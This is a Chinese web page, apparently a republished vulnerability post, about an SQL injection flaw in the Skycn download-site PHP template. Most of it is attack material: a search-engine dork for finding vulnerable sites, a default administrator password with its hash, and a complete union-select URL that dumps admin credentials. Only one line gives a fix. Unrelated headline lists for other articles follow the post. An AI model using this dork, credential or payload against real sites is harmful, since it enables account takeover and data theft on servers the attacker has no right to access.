类型:电子教程大小:8.5M语言:中文 评分:8.3

标签:

立即下载

天空下载站是国内著名的下载站点,提供国内外最新免费软件、共享软件下载。其在全国各地铁通、联通、电信、信息港等都建有以php+MySql架设的下载分站,相当一部分下载分站的建站程序采用同一套建站模板,而这套建站模板存在SQL注入漏洞。

关键词:inurl:down.php

漏洞文件:down.php

down.php中没有对get变量$id做任何过滤措施,导致攻击者可以任意使用SQL注入语句进行攻击,通过测试发现,多数管理员登陆口令默认密码并未修改,默认管理员信息为1111_7363a304be1a682efaf10702fc7b97d8,解密密码hash可知默认密码为sky!@#cn!

注入利用:

keyword:Copyright©1998 - 2007 Skycn.com All Rights Reserved inurl:down.php

http://site.com/down.php?id=1+union+select+column_numbers+from+table_name

column_numbers:不固定,通常为50+,也有少于40,例如临沂信息港测试为38个显示位

table_name:管理员表段名为master,字段名为username,password

在字段2软件标题显示位填写concat(username,0x5f,password)即可爆出管理员登陆口令

SQL EXP:

http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master

安全提示:

解决方法:$id=(int)$_GET['id'];

完美天空下载站php程序,天空下载站(skycn)程序存在SQL注入漏洞及最新解决方案...相关推荐

  1. wap建站程序_因建站系统存在SQL注入漏洞,国内两家网络公司被CNVD公开点名

    2月27日,国家信息安全漏洞共享平台(CNVD)的漏洞列表收录了两个新的SQL注入漏洞--CNVD-2019-04308和CNVD-2019-05341.根据CNVD公布的信息来看,这两个漏洞的危害级 ...

  2. vul.php,phpvulhunter 精短简小的PHP代码安全审计,可 SQL注入漏洞、跨站脚本等 Exploit 弱点检测 267万源代码下载- www.pudn.com...

    文件名称: phpvulhunter下载  收藏√  [ 5  4  3  2  1 ] 开发工具: PHP 文件大小: 555 KB 上传时间: 2016-11-10 下载次数: 0 提 供 者: ...

  3. 蓝雨设计整站SQL注入漏洞

    本来是投稿文章来的,因为稿件的问题所以就上不了杂志,再加上最近有些人在网站留言说三道四的猜测蓝雨的问题,所以我就公开漏洞预警所说的漏洞,官方已经把版本都打了补丁,当然有些使用网站至今还是存在着SQL注 ...

  4. C#编写程序操作数据库如何防止SQL注入漏洞的发生

    为什么80%的码农都做不了架构师?>>>    我们在使用C# 编程的时候,经常会遇到操作数据库的地方,如果我们不注意,可能编写的代码就是下面这样 在前台定义了一个文本框,name值 ...

  5. 动网php_动网论坛PHP增强版(动网论坛PHP2.0++官方下载)V2.0官方版下载 - 下载吧...

    开拓的力量,前进的方向,经历了一个冬的孕育,动网PHP2.0++正式版在我们团队的精心培养下,顺利与大家见面了.动网论坛PHP增强版此次正式版,一如既往的延续了PHP2.0++的创新功能,在新功能的基 ...

  6. php安全检测软件,SQL注入PHP注入检测工具下载

    如果你是一名网站管理员或者服务器管理员,你需要关心的是网站的安全问题,为了方便大家测试,极速小编为你介绍一款功能强大的网站安全测试工具--微粒明小子旁注,它可以对网站进行旁注检测.SQL注入检测.PH ...

  7. Pipy:保护 Kubernetes 上的应用程序免受 SQL 注入和 XSS 攻击

    注入攻击在 OWASP Web 应用 10 大安全风险[1] 排名 2021 年下滑至第 3 位,多年来一直位居前十.SQL 注入 (SQLi) 是一种用于攻击网站和 Web 应用程序的常见注入技术. ...

  8. B站小迪安全笔记第12天-SQL注入之简要注入

    前言: 在本系列课程学习中,SQL注入漏洞将是重点部分,其中 SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需 要按部就班的学习,才能学会相关 SQL注入的核心.同样此类漏洞 ...

  9. Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解

    前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误.其实sql注入漏洞就是一个.作为一个菜鸟小程 ...

最新文章

  1. javascript操作select下拉列表框的一点小经验
  2. 拥抱开源IaaS云平台:360度盘点OpenStack
  3. linux100day(day7)--用户管理和权限管理简单介绍
  4. java学习(149):字符输入流
  5. 图像分类最新技术综述论文: 21种半监督、自监督和无监督学习方法一较高低
  6. 定量的方法如何能划分类别?
  7. vbox设置剪切板共享
  8. 防伪拉线 CCD 纠偏控制器
  9. laravel中的ORM模型修改created_at,updated_at,deleted_at三个时间字段类型
  10. AUTOCAD——超级填充
  11. 关于pr(Premiere)的记录
  12. 联想服务器修改显存,如何调整用于显卡的共享内存
  13. Pygame详解(十一):Rect 对象
  14. html网页的主题标签是什么6,HTML标签及标签属性大全(网页制作必备知识)
  15. 开发工业应用所需具备的技能,你掌握多少?
  16. 内存函数-----Memcmp
  17. 解决错误 Bad key “text.kerning_factor“ on line 4 in
  18. 《统计学习方法》学习笔记(一):概论
  19. 6.前端CSS之布局属性(盒子,float,overflow,opsition,z-index,opacity)
  20. 任务01-05-登录界面

热门文章

  1. 【思维题】B024_LC_N 天后的牢房(状态压缩 + 循环节)
  2. C语言程序设计————学习知识归纳总结(一)
  3. IO流——(8) 流的操作规律
  4. 大家看看,我要裁掉哪个组员呢?太难了
  5. 深度解析源码strcpy函数
  6. 动力电池编码_工信部就动力电池规格尺寸及编码国家标准征求意见
  7. 亲自动手制作一台迷你小主机
  8. 什么类型的SSL证书有利于网站安全?
  9. PIC32MX单片机系列之PWM
  10. “新能源+国产化”双重利好,昂视乘风出圈